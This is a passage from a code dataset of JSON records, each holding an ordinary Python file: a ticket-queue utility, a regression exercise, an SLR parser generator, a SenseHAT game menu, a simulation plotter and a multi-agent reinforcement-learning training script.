toRet\n\ttempProcessor.writeToFile(params)\n\ttempProcessor.unlockFile()\n\tlogger.logInfo(NAME + \"Zwracam kolejny oczekiwany bilet: \" + str(newTicket))\n\treturn newTicket\n\n\ndef skipTicket(ticket):\n\ttempProcessor = FileProcessor(\"/home/dur/Projects/ServerSide/config/tempParams.conf\")\n\ttempProcessor.lockFile()\n\tparams = tempProcessor.readFile()\n\tcurrentTicket = params[EXPECTED_TICKET]\n\tif int(currentTicket) == int(ticket):\n\t\tparams[EXPECTED_TICKET] = setNextExpectedTicket(ticket)\n\telse:\n\t\ttoSkip = params[SKIP_TICKETS]\n\t\ttoRet = \"\"\n\t\tif(toSkip != None and len(toSkip) != 0):\n\t\t\tarray = toSkip.split(\",\")\n\t\t\tarray.append(ticket)\n\t\t\tfor single in sortStringsByIntValue(array):\n\t\t\t\ttoRet= toRet + str(single) + \",\"\n\t\t\ttoRet = toRet[:-1]\n\t\telse:\n\t\t\ttoRet += str(ticket)\n\t\tparams[SKIP_TICKETS] = toRet\n\ttempProcessor.writeToFile(params)\n\ttempProcessor.unlockFile()\n\n\ndef sortStringsByIntValue(stringArray):\n\tvalue = []\n\tfor a in stringArray:\n\t\tvalue.append(int(a))\n\treturn sorted(value)\n\n\ndef getCurrentExpectedTicket():\n\tparams = readTempVars()\n\treturn params[EXPECTED_TICKET]\n\n\ndef removeAllSkippedLowerThen(skipped, ticket):\n\tret = []\n\tif skipped != None and len(skipped) > 0:\n\t\tfor single in skipped:\n\t\t\tif int(single) >= int(ticket):\n\t\t\t\tret.append(single)\n\treturn ret","sub_path":"ServerSide/database/utils1/TicketUtil.py","file_name":"TicketUtil.py","file_ext":"py","file_size_in_byte":2686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"558405918","text":"fname = input(\"Enter file name: \")\nif len(fname) < 1 : fname = \"mbox-short.txt\"\n\nh_count = {}\nfh = open(fname)\nfor line in fh:\n if line.startswith(\"From \"):\n words = line.split()\n word = words[5]\n h_count[word[0:2]] = h_count.get(word[0:2],0) + 1\n\nh_tuple = h_count.items()\n# print(h_tuple)\nfor hour,value in sorted(h_tuple):\n print(hour,value)\n","sub_path":"Course_2/Task_7.py","file_name":"Task_7.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"619964935","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pylab as pl\nimport numpy as np\n\n\ndf = pd.read_csv(\"/Users/advertmaster3/PycharmProjects/pythonProject2/ML_IBM/FuelConsumption.csv\")\n# take a look at the dataset\ndf.head()\n# summarize the data\n\ndf.describe()\n\ncdf = df[['ENGINESIZE', 'FUELCONSUMPTION_CITY','FUELCONSUMPTION_COMB', 'CO2EMISSIONS', 'FUELCONSUMPTION_COMB_MPG']]\ncdf.head(1000)\n\nviz = cdf[['ENGINESIZE','FUELCONSUMPTION_CITY','CO2EMISSIONS','FUELCONSUMPTION_COMB','FUELCONSUMPTION_COMB_MPG']]\nviz.hist()\n#plt.show()\n\n\nplt.scatter(cdf.FUELCONSUMPTION_CITY, cdf.CO2EMISSIONS, color='blue')\nplt.xlabel(\"FUELCONSUMPTION_CITY\")\nplt.ylabel(\"Emission\")\n#plt.show()\n\n\nmsk = np.random.rand(len(df)) < 0.8\ntrain = cdf[msk]\ntest = cdf[~msk]\n#print (test)\n\n\n\nplt.scatter(train.FUELCONSUMPTION_CITY, train.CO2EMISSIONS, color='blue')\nplt.xlabel(\"FUELCONSUMPTION_CITY\")\nplt.ylabel(\"Emissions\")\n#plt.show()\n\n\n\nfrom sklearn import linear_model\nregr = linear_model.LinearRegression()\ntrain_x = np.asanyarray(train[['FUELCONSUMPTION_CITY']])\ntrain_y = np.asanyarray(train[['CO2EMISSIONS']])\nregr.fit (train_x, train_y)\n# The coefficients\nprint ('Coefficients: ', regr.coef_)\nprint ('Intercept: ',regr.intercept_)\n\n\nplt.scatter(train.FUELCONSUMPTION_CITY, train.CO2EMISSIONS, color='blue')\nplt.plot(train_x, regr.coef_[0][0]*train_x + regr.intercept_[0], '-r')\nplt.xlabel(\"Engine size\")\nplt.ylabel(\"Emission\")\n\n\nfrom sklearn.metrics import r2_score\n\ntest_x = np.asanyarray(test[['FUELCONSUMPTION_CITY']])\ntest_y = np.asanyarray(test[['CO2EMISSIONS']])\ntest_y_ = regr.predict(test_x)\n\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(test_y_ - test_y)))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((test_y_ - test_y) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(test_y , test_y_) )\nprint (regr.predict(test_x))\n\n\n\n\n\n\n","sub_path":"LAB1_ML_LINEAR.py","file_name":"LAB1_ML_LINEAR.py","file_ext":"py","file_size_in_byte":1856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"278637152","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport glob\nimport os\nimport Copan.System.Git\nimport Copan.System.Path\nfrom PyQt4 import uic\n\n\nDOIT_CONFIG = {\n 'default_tasks': [\n '01_version',\n '02_pyqtforms',\n ]\n}\n\n\ndef task_01_version():\n def write_file():\n\n if \"TOMTOOL_VERSION\" not in os.environ:\n try:\n version, _, _ = Copan.System.Git.get_git_build_number(\".\")\n except Exception:\n version = None\n else:\n version = os.environ[\"TOMTOOL_VERSION\"]\n\n if version:\n with open('data/version', 'wb') as f:\n f.write(version)\n\n return {\n 'verbosity': 2,\n 'targets': ['data/version'],\n 'actions': [(write_file,)],\n }\n\n\ndef task_02_pyqtforms():\n def get_forms():\n forms = {}\n for source in glob.iglob('data/forms/*.ui'):\n source_filename = Copan.System.Path.split(source)[-1]\n target_filename = source_filename.replace('.ui', '.py')\n target = os.path.join('TomTool', 'Generated', target_filename)\n forms[target] = source\n return forms\n\n def forms_actions():\n for (target, source) in get_forms().iteritems():\n with open(target, 'w') as f:\n uic.compileUi(source, f, True)\n return True\n\n forms = get_forms()\n return {\n 'verbosity': 2,\n 'actions': [(forms_actions,)],\n 'file_dep': forms.values(),\n 'targets': forms.keys(),\n }\n","sub_path":"dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"620379928","text":"################################### \n#\twe plot the metric variables\n#\tAlpha, Beta, Psi, and the \n#\tmass aspect \n#\t\n#\tNote that as DT = LAMBDA * DR,\n#\twe do not compare every time \n#\tstep for DR, 2*DR, & 4*DR\n#\n###################################\n\nimport matplotlib.pyplot as plt\nimport numpy as np \n \nhomeDir = \"/home/jripley/Documents/Research/SphericalCollapse/\" \ntxtFDir = \"/home/jripley/Documents/Research/SphericalCollapse/txtFiles/\" \npltFDir = \"/home/jripley/Documents/Research/SphericalCollapse/plotFiles/\" \n\nTOLERANCE = 0.0001\t# how small we're willing the denominator in the convergence test to be\n\ndef massAspectPlot(fileName):\n############# DATA FORMATTING ###########\n#\tsprintf(fileName_ELLIPTIC,\"%sXiPiDataFLAT_%d_%d_%d_%d_%.3f_%.3f_%.2f_%.2f_%.2f.txt\", \n#\t\t\ttxtFDir, NR, NT, RSTEPSAVE, TSTEPSAVE, DR, LAMBDA, A, DELTA, R0) ; \n#\t\t\t 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 \n# \tnote though: we only keep slides with not NaN; which is tSteps \n\tfileNameSave = fileName \n\tfileName= fileName.split(\"_\")\n\theader \t= fileName[0]\n\tNR \t\t= fileName[1]\n\tNT \t\t= fileName[2]\n\tRSSAVE \t= fileName[3]\n\tTSSAVE\t= fileName[4]\n\tDR \t\t= fileName[5]\n\tLAMBDA = fileName[6]\n\tA \t\t= fileName[7]\n\tDELTA \t= fileName[8]\n\tR0 \t= fileName[9]\n\t\n#\n#\tNOTE: DT = LAMBDA * DR \n#\n# \tfor each time step, the save format is \n#\tAlpha,Beta,Psi,massAspect;...\n#\n\tAlpha = []\n\tBeta = []\n\tPsi = []\n\tmAspt = []\n\twith open(\"{}{}.txt\".format(txtFDir, fileNameSave), \"r\") as f:\n\t\tfor line in f:\n\t\t\tAlphaLine = []\n\t\t\tBetaLine = []\n\t\t\tPsiLine = []\n\t\t\tmAsptLine = []\n\t\t\tline = line.split(\";\")[:-1]\n\t\t\tfor i in range(len(line)):\t\n\t\t\t\tval = line[i].split(\",\")\n\t\t\t\tAlphaLine.append(float(val[0]))\n\t\t\t\tBetaLine.append(float(val[1]))\n#\t\t\t\tPsiLine.append(2*(i*float(DR)*float(val[2])-1))\n\t\t\t\tPsiLine.append(float(val[2]))\n\t\t\t\tmAsptLine.append(float(val[3]))\t\n\t\t\tAlpha.append(AlphaLine)\n\t\t\tBeta.append(BetaLine)\n\t\t\tPsi.append(PsiLine)\n\t\t\tmAspt.append(mAsptLine)\t\n\t\n####################################################\n#\tCOMPUTE THE CONVERGENCE RATIO FOR EACH TIME STEP \n####################################################\n#\tTime to plot these...\t\n\tAlphaData = Alpha[0] \t\n\tBetaData = Beta[0] \t\n\tPsiData = Psi[0] \t\n\tmAsptData = mAspt[0] \t\n\tAlphaDataShift = [x - 1 for x in Alpha[0]]\t\n\tPsiDataShift = [x - 1 for x in Psi[0]]\t\n\txData = [ i * float(DR) * float(RSSAVE) for i in range(len(AlphaData)) ]\n##########\n#\tPlot the Alpha data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n\tplt.title(\"Alpha field value at time slice 0\".format(DR))\n\tplt.plot(xData, AlphaData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}AlphaPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n##########\n#\tPlot the Beta data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n\tplt.title(\"Beta field value at time slice 0\".format(DR))\n\tplt.plot(xData, BetaData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}BetaPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n##########\n#\tPlot the Psi data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n\tplt.title(\"Psi field value at time slice 0\".format(DR))\n\tplt.plot(xData, PsiData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}PsiPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n###########\n#\tPlot the mass aspect data\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n#\tplt.ylim([-1,10])\t\t\n\tplt.title(\"Mass aspect value at time slice 0\".format(DR))\n\tplt.plot(xData, mAsptData)#, label=\"p(i*DT)\") \n#\tplt.legend()\n\tplt.savefig(\"{}MassAspectPlot_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\n##########\n#\tPLOT EVERYTHING\n\tplt.xlabel(\"DR*i\")\n\tplt.ylabel(\"field value\")\n#\tplt.ylim([-1,10])\t\t\n\tplt.title(\"All the variables\".format(DR))\n\tplt.plot(xData, AlphaDataShift, label=\"Alpha - 1\") \n\tplt.plot(xData, BetaData,\t\tlabel=\"Beta\") \n\tplt.plot(xData, PsiDataShift,\tlabel=\"Psi - 1\") \n#\tplt.plot(xData, mAsptData, \t\tlabel=\"MsAspct\") \n\tplt.legend()\n\tplt.savefig(\"{}AllTheVariables_0_{}.pdf\".format(pltFDir, fileNameSave)) \n\tplt.close(\"all\")\nif __name__ == \"__main__\":\n\tprint(\"(Xi,Pi) convergence testing)\")\n\tfileName = raw_input(\"Name of file:\")\n\tmassAspectPlot(fileName)\n\n","sub_path":"massAspectPlot.py","file_name":"massAspectPlot.py","file_ext":"py","file_size_in_byte":4151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"204394278","text":"#Python CW3 Q4\r\n\r\ndef getDigits(s):\r\n \r\n char = list(s)\r\n output = \"\"\r\n\r\n for i in char:\r\n if i.isdigit() == True:\r\n output = output + str(i)\r\n return output\r\n\r\nresult = getDigits('**1.23a-42')\r\n\r\nprint(result)\r\n","sub_path":"Computational Maths/Workshop 9/WS9Q4.py","file_name":"WS9Q4.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"128577139","text":"\nimport copy\n\ngrammar = []\nnew_grammar = []\nterminals = []\nnon_terminals = []\nI_n = {}\nshift_list = []\nreduction_list = []\naction_list = []\nrule_dict = {}\nSR = []\nRR = []\n\ndef Conflict():\n\tglobal SR, RR, shift_list, reduction_list\n\tconflict = False\n\tfor S in shift_list:\n\t\tfor R in reduction_list:\n\t\t\tif S[:2] == R[:2]:\n\t\t\t\tSR.append([S, R])\n\t\t\t\tconflict = True\n\n\tfor R1 in reduction_list:\n\t\tfor R2 in reduction_list:\n\t\t\tif R1 == R2:\n\t\t\t\tcontinue\n\n\t\t\tif R1[:2] == R2[:2]:\n\t\t\t\tRR.append(R1)\n\t\t\t\tconflict = True\n\n\treturn conflict\n\n\ndef read_grammar():\n\tglobal grammar, terminals, non_terminals, rule_dict\n\n\tfile_name = str(input(\"Enter Grammar File Name:: \"))\n\n\ttry:\n\t\tgrammar_file = open(file_name, \"r\")\n\texcept:\n\t\tprint(\"Cannot Find File Named\", file_name)\n\t\texit(0)\n\n\tfor each_grammar in grammar_file:\n\t\tgrammar.append(each_grammar.strip())\n\n\t\tif each_grammar[0] not in non_terminals:\n\t\t\tnon_terminals.append(each_grammar[0])\n\n\tfor each_grammar in grammar:\n\t\tfor token in each_grammar.strip().replace(\" \", \"\").replace(\"->\", \"\"):\n\t\t\tif token not in non_terminals and token not in terminals:\n\t\t\t\tterminals.append(token)\n\n\tfor l in range(1, len(grammar)+1):\n\t\trule_dict[l] = grammar[l-1]\n\n\ndef augmented_grammar():\n\tglobal grammar, new_grammar\n\tread_grammar()\n\tif \"'\" not in grammar[0]:\n\t\tgrammar.insert(0, grammar[0][0]+\"'\"+\"->\"+grammar[0][0])\n\n\tnew_grammar = []\n\tfor each_grammar in grammar:\n\t\tidx = each_grammar.index(\">\")\n\t\teach_grammar = each_grammar[:idx+1]+\".\"+each_grammar[idx+1:]\n\t\tnew_grammar.append(each_grammar)\n\n\ndef compute_I0():\n\tglobal new_grammar, non_terminals, I_n\n\taugmented_grammar()\n\n\tgrammar2add = []\n\tgrammar2add.append(new_grammar[0])\n\ti = 0\n\tfor each in grammar2add:\n\t\tcurrent_pos = each.index(\".\")\n\t\tcurrent_variable = each[current_pos+1]\n\n\t\tif current_variable in non_terminals:\n\t\t\tfor each_grammar in new_grammar:\n\t\t\t\tif each_grammar[0] == current_variable and each_grammar not in grammar2add:\n\t\t\t\t\tgrammar2add.append(each_grammar)\n\n\t\tI_n[i] = grammar2add\n\n\ndef GOTO():\n\tglobal grammar, non_terminals, terminals, I_n, shift_list\n\tcompute_I0()\n\n\tvariables = non_terminals + terminals\n\ti = 0\n\tcurrent_state = 0\n\tdone = False\n\t\n\twhile (not done):\n\t\tfor each_variable in variables:\n\t\t\tgrammar2add = []\n\t\t\ttry:\n\t\t\t\tfor each_rule in I_n[current_state]:\n\t\t\t\t\tif each_rule[-1] == \".\":\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tdot_idx = each_rule.index(\".\")\n\n\t\t\t\t\tif each_rule[dot_idx+1] == each_variable:\n\t\t\t\t\t\t\n\t\t\t\t\t\trule = copy.deepcopy(each_rule)\n\t\t\t\t\t\trule = rule.replace(\".\", \"\")\n\t\t\t\t\t\trule = rule[:dot_idx+1]+\".\"+rule[dot_idx+1:]\n\t\t\t\t\t\tgrammar2add.append(rule)\n\n\t\t\t\t\t\tfor rule in grammar2add:\n\t\t\t\t\t\t\tdot_idx = rule.index(\".\")\n\t\t\t\t\t\t\tif rule[-1] == \".\":\n\t\t\t\t\t\t\t\tpass\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tcurrent_variable = rule[dot_idx+1]\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tif current_variable in non_terminals:\n\t\t\t\t\t\t\t\t\tfor each_grammar in new_grammar:\n\t\t\t\t\t\t\t\t\t\tif each_grammar[0] == current_variable and each_grammar[1] != \"'\" and each_grammar not in grammar2add:\n\t\t\t\t\t\t\t\t\t\t\tgrammar2add.append(each_grammar)\n\n\t\t\texcept:\n\t\t\t\tdone = True\n\t\t\t\tbreak\n\n\t\t\tif grammar2add:\n\t\t\t\tif grammar2add not in I_n.values():\n\t\t\t\t\ti += 1\n\t\t\t\t\tI_n[i] = grammar2add\n\n\t\t\t\tfor k,v in I_n.items():\n\t\t\t\t\tif grammar2add == v:\n\t\t\t\t\t\tidx = k\n\t\t\t\t\n\t\t\t\tshift_list.append([current_state, each_variable, idx])\n\t\tcurrent_state += 1\n\n\ndef follow(var):\n\t\n\tglobal rule_dict, terminals\n\n\tvalue = []\n\tif var == rule_dict[1][0]:\n\t\tvalue.append(\"$\")\n\n\tfor rule in rule_dict.values():\n\t\t\n\t\tlhs, rhs = rule.split(\"->\")\n\n\t\tif var == rule[-1]:\n\t\t\tfor each in follow(rule[0]):\n\t\t\t\tif each not in value:\n\t\t\t\t\tvalue.append(each)\n\n\t\tif var in rhs:\n\t\t\tidx = rhs.index(var)\n\n\t\t\ttry:\n\t\t\t\tif rhs[idx+1] in non_terminals and rhs[idx+1] != var:\n\t\t\t\t\tfor each in follow(rhs[idx+1]):\n\t\t\t\t\t\tvalue.append(each)\n\t\t\t\telse:\n\t\t\t\t\tvalue.append(rhs[idx+1])\n\t\t\texcept:\n\t\t\t\tpass\n\treturn value\n\n\ndef first(nt):\n global non_terminals,rule_dict\n d1={}\n d2={}\n for i in non_terminals:\n d1[i]=[]\n d2[i]=[]\n for j in list(rule_dict.values()):\n if j[0]==i and j[3]!=j[0]:\n if j[3] in non_terminals:\n d1[i].append(j[3])\n else:\n d2[i].append(j[3])\n l=d2[nt]\n for i in d1[nt]:\n d1[nt].extend(d1[i])\n for i in d1[nt]:\n l=l+d2[i]\n \n return l\n\ndef reduction():\n\tglobal I_n, rule_dict, reduction_list\n\t\n\treduction_list.append([1, \"$\", \"Accept\"])\n\n\tfor item in I_n.items():\n\t\ttry:\n\t\t\tfor each_production in item[1]:\n\t\t\t\tlhs, rhs = each_production.split(\".\")\n\n\t\t\t\tfor rule in rule_dict.items():\n\n\t\t\t\t\tif lhs == rule[1]:\n\t\t\t\t\t\tf = follow(lhs[0])\n\n\t\t\t\t\t\tfor each_var in f:\n\t\t\t\t\t\t\treduction_list.append([item[0], each_var, \"R\"+str(rule[0])])\n\n\t\texcept:\n\t\t\tpass\n\n\ndef test(string):\n\tglobal action_list, shift_list, reduction_list\n\tdone = False\n\tstack = []\n\tstack.append(0)\n\n\tprint(\"\\n\\nSTACK\\t\\tSTRING\\t\\tACTION\")\n\twhile not done:\n\t\tReduce = False\n\t\tShift = False\n\n\t\tfor r in reduction_list:\n\t\t\tif r[0] == int(stack[-1]) and r[1] == string[0]:\n\t\t\t\tReduce = True\n\t\t\t\tprint(''.join(str(p) for p in stack), \"\\t\\t\", string, \"\\t\\t\", \"Reduce\", r[2])\n\n\t\t\t\tif r[2] == 'Accept':\n\t\t\t\t\treturn 1\n\t\t\t\tvar = rule_dict[int(r[2][1])]\n\t\t\t\tlhs, rhs = var.split(\"->\")\n\n\t\t\t\tfor x in range(len(rhs)):\t\t\t\t\t\n\t\t\t\t\tstack.pop()\n\t\t\t\t\tstack.pop()\n\t\t\t\t\t\n\t\t\t\tvar = lhs\n\t\t\t\tstack.append(var)\n\n\t\t\t\tfor a in action_list:\n\t\t\t\t\tif a[0] == int(stack[-2]) and a[1] == stack[-1]:\n\t\t\t\t\t\tstack.append(str(a[2]))\n\t\t\t\t\t\tbreak\n\t\t\t\t\n\t\tfor g in shift_list:\n\t\t\tif g[0] == int(stack[-1]) and g[1] == string[0]:\n\t\t\t\tShift = True\n\t\t\t\tprint(''.join(str(p) for p in stack), \"\\t\\t\", string, \"\\t\\t\", \"Shift\", \"S\"+str(g[2]))\n\t\t\t\tstack.append(string[0])\n\t\t\t\tstack.append(str(g[2]))\n\t\t\t\tstring = string[1:]\n\n\t\t\t\t\n\t\n\t\tif not Reduce and not Shift:\n\t\t\tprint(''.join(str(p) for p in stack), \"\\t\\t\", string)\n\t\t\treturn 0\n\t\t\t\t\n\n\ndef printGOTO_ACTION():\n global terminals,non_terminals,reduction_list,shift_list\n l=[\" \"]+terminals+['$']+non_terminals\n l2=[]\n for i in range(max(max(shift_list)[0],max(reduction_list)[0])+1):\n l2.append([\" \"]*len(l))\n \n for item in shift_list:\n i=l.index(item[1])\n l2[item[0]][0]='I'+str(item[0])\n if l[i] in non_terminals:\n l2[item[0]][i]=item[2]\n else:\n l2[item[0]][i]='S'+str(item[2])\n for item in reduction_list:\n i=l.index(item[1])\n l2[item[0]][0]='I'+str(item[0])\n l2[item[0]][i]=item[2]\n \n for i in l:\n print(i,\" \",end=\" \")\n print()\n for i in l2:\n for j in i:\n print(j,\" \",end=\" \")\n print()\n\n\n\ndef main():\n global I_n, shift_list, reduction_list, action_list, SR, RR\n GOTO()\n reduction()\n \n print(\"\\n--------------------RULES--------------------\")\n for item in rule_dict.items():\n print(item[1])\n print(\"\\n------------AUGMENTED RULES------------------\")\n for item in new_grammar:\n print(item.replace(\".\", \"\"))\n \n print(\"\\n\")\n print(\"Terminals:\", terminals)\n print(\"NonTerminals:\", non_terminals)\n \n print(\"\\n------------------FOLLOW SET--------------------\")\n for item in non_terminals:\n print(item,\": \",follow(item))\n \n print(\"\\n------------------FIRST SET--------------------\")\n for item in non_terminals:\n print(item,\": \",first(item))\n \n print(\"\\n--------------------STATES--------------------\")\n for item in I_n.items():\n print('S'+str(item[0])+':',item[1])\n \n print(\"\\n--------------------GOTO OPERATIONS--------------------\")\n for item in shift_list:\n print(item)\n \n \n print(\"\\n--------------------REDUCTION--------------------\")\n for item in reduction_list:\n print(item)\n \n print(\"\\n-----------ACTION & GOTO TABLE--------------------\")\n printGOTO_ACTION()\n \n if Conflict():\n if SR != []:\n print(\"SR conflict\")\n for item in SR:\n print(item)\n print\n if RR != []:\n print(\"RR conflict\")\n for item in RR:\n print(item)\n print\n exit(0)\n \n else:\n print(\"\\nNO CONFLICT\")\n \n action_list.extend(shift_list)\n action_list.extend(reduction_list)\n\n string = str(input(\"\\n\\nEnter String:: \"))\n \n try:\n if string[-1] != \"$\":\n string = string + \"$\"\n except:\n print(\"InputError\")\n exit(0)\n \n print(\"\\nTest String:\", string)\n result = test(string)\n \n if result == 1:\n print(\"---ACCEPTED---\")\n elif result == 0:\n print(\"---NOT ACCEPTED---\")\n return 0\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"slr.py","file_name":"slr.py","file_ext":"py","file_size_in_byte":8620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"503273651","text":"\"\"\"\nFile: games.py\nAuthor: Raphael Holzer\nDate: 27.01.2019\n\nThis module imports 6 SenseHAT game modules :\n- morpion\n- game2048\n- mines\n- tetris\n- connect4\n- labyrinth\n\"\"\"\n\nfrom sense_hat import SenseHat\nfrom gamelib import *\nimport morpionfinal\nimport game2048\nimport mines\nimport tetris\nimport connect4\nimport labyrinth\n\n\ndef main():\n \"\"\"Present a question mark (?) and allow to choose a game.\n The left/right button increments/decrements the index number.\n The up button displays the game name.\n The middle button starts the selected game.\n \"\"\"\n \n active = True\n sense = SenseHat()\n \n games = ['morpion', '2048', 'mines', 'connect4', 'tetris', 'labyrinth']\n functions = [morpionfinal.main, game2048.main, mines.main, connect4.main,\n tetris.main, labyrinth.main]\n i = 0\n n = len(games)\n \n sense.show_message('games', text_colour=BLUE)\n sense.show_letter('?')\n\n while active:\n event = sense.stick.wait_for_event()\n if event.action == 'pressed':\n if event.direction == 'right':\n i = (i+1) % n\n elif event.direction == 'left':\n i = (i-1) % n\n elif event.direction == 'up':\n sense.show_message(games[i], text_colour=GREEN)\n \n elif event.direction == 'middle':\n functions[i]()\n \n sense.stick.get_events() \n sense.show_letter(str(i), text_colour=RED)\n\n\n# Execute the main() function when the file is executed,\n# but do not execute when the module is imported as a module.\nprint('module name =', __name__)\n\nif __name__ == '__main__':\n main() ","sub_path":"games/2048/games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"531599937","text":"\"\"\"\nSingle instance run Gym with marl\n\"\"\"\n\nimport argparse\nimport os\nimport pprint\nimport numpy as np\n\nimport ray\nimport yaml\n\nfrom malib import settings\n\nfrom malib.agent import get_training_agent\nfrom malib.rollout import rollout_func\nfrom malib.utils import logger\nfrom malib.utils.logger import Log\nfrom malib.envs import GymEnv\nfrom malib.rollout.rollout_worker import RolloutWorker\nfrom malib.backend.datapool.offline_dataset_server import Episode\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\nparser = argparse.ArgumentParser(\n \"Single instance of MARL training on gym environments.\"\n)\nparser.add_argument(\n \"--config\", type=str, help=\"YAML configuration path.\", required=True\n)\nparser.add_argument(\n \"--threaded\", action=\"store_true\", help=\"Whether use threaded sampling.\"\n)\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n with open(os.path.join(BASE_DIR, args.config), \"r\") as f:\n config = yaml.load(f)\n\n # ================== Clean configuration =================================================================\n env_desc = config[\"env_description\"]\n env_desc[\"config\"] = env_desc.get(\"config\", {})\n env_desc[\"creator\"] = GymEnv\n env = GymEnv(**env_desc[\"config\"])\n\n possible_agents = env.possible_agents\n observation_spaces = env.observation_spaces\n action_spaces = env.action_spaces\n\n env_desc[\"possible_agents\"] = env.possible_agents\n env.close()\n\n agent_mapping_func = lambda agent: \"share\"\n\n if args.threaded:\n ray.init()\n\n exp_cfg = logger.start(group=\"single_instance\", name=\"marl\")\n # ========================================================================================================\n\n global_step = 0\n\n _logger = logger.get_logger(\n log_level=settings.LOG_LEVEL,\n name=\"single_instance_marl\",\n remote=settings.USE_REMOTE_LOGGER,\n mongo=settings.USE_MONGO_LOGGER,\n **exp_cfg,\n )\n\n # ==================================== Init learners and rollout =========================================\n learners = {}\n for env_agent_id in env.possible_agents:\n interface_id = agent_mapping_func(env_agent_id)\n if learners.get(interface_id) is None:\n learners[interface_id] = get_training_agent(\n config[\"training\"][\"interface\"][\"type\"]\n )(\n assign_id=interface_id,\n env_desc=env_desc,\n training_agent_mapping=None,\n algorithm_candidates=config[\"algorithms\"],\n observation_spaces=observation_spaces,\n action_spaces=action_spaces,\n exp_cfg=exp_cfg,\n )\n learners[interface_id].register_env_agent(env_agent_id)\n\n rollout_handler = RolloutWorker(\n worker_index=None,\n env_desc=env_desc,\n metric_type=config[\"rollout\"][\"metric_type\"],\n remote=False,\n exp_cfg=exp_cfg,\n )\n # =======================================================================================================\n\n # ================================= Register policies for agents and create buffers =====================\n trainable_policy_mapping = {}\n for learner in learners.values():\n for agent in learner.agent_group():\n pid, policy = learner.add_policy_for_agent(agent, trainable=True)\n # record policy information\n # register policy into rollout handlers\n rollout_handler.update_population(agent, pid, policy)\n trainable_policy_mapping[agent] = pid\n\n agent_episodes = {\n aid: Episode(\n env_desc[\"config\"][\"env_id\"],\n trainable_policy_mapping,\n capacity=config[\"dataset_config\"][\"episode_capacity\"],\n )\n for aid in env_desc[\"possible_agents\"]\n }\n\n stationary_policy_distribution = {\n aid: {pid: 1.0} for aid, pid in trainable_policy_mapping.items()\n }\n # ======================================================================================================\n\n # ==================================== Main loop =======================================================\n for epoch in range(1000):\n print(f\"\\n==================== epoch #{epoch} ===============\")\n total_frames = 0\n min_size = 0\n with Log.stat_feedback(\n log=True,\n logger=_logger,\n worker_idx=\"Rollout\",\n global_step=epoch,\n group=\"single_instance\",\n ) as (statistic_seq, processed_statistics):\n while min_size < config[\"dataset_config\"][\"learning_start\"]:\n statistics, num_frames = rollout_handler.sample(\n callback=rollout_func.simultaneous,\n num_episodes=config[\"rollout\"][\"num_episodes\"],\n fragment_length=config[\"rollout\"][\"fragment_length\"],\n policy_combinations=[trainable_policy_mapping],\n explore=True,\n role=\"rollout\",\n policy_distribution=stationary_policy_distribution,\n threaded=args.threaded,\n episodes=agent_episodes,\n )\n statistic_seq.extend(statistics)\n min_size = min([e.size for e in agent_episodes.values()])\n total_frames += num_frames\n\n print(\"rollout statistics:\")\n pprint.pprint(processed_statistics[0])\n print(\"sampled new frames:\", total_frames, \"total_size:\", min_size)\n\n batches = {}\n idxes = np.random.choice(min_size, config[\"training\"][\"config\"][\"batch_size\"])\n for agent in env.possible_agents:\n batch = agent_episodes[agent].sample(idxes=idxes)\n batches[agent] = batch\n\n print(\"-------------- traininig -------\")\n for iid, interface in learners.items():\n with Log.stat_feedback(\n log=True,\n logger=_logger,\n worker_idx=iid,\n global_step=global_step,\n group=\"single_instance\",\n ) as (statistics_seq, processed_statistics):\n statistics_seq.append(\n learners[iid].optimize(\n policy_ids=trainable_policy_mapping.copy(),\n batch=batches,\n training_config=config[\"training\"][\"config\"],\n )\n )\n pprint.pprint(processed_statistics[0])\n global_step += 1\n # =====================================================================================================\n logger.terminate()\n","sub_path":"examples/single_instance_gym.py","file_name":"single_instance_gym.py","file_ext":"py","file_size_in_byte":6651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"474602384","text":"import 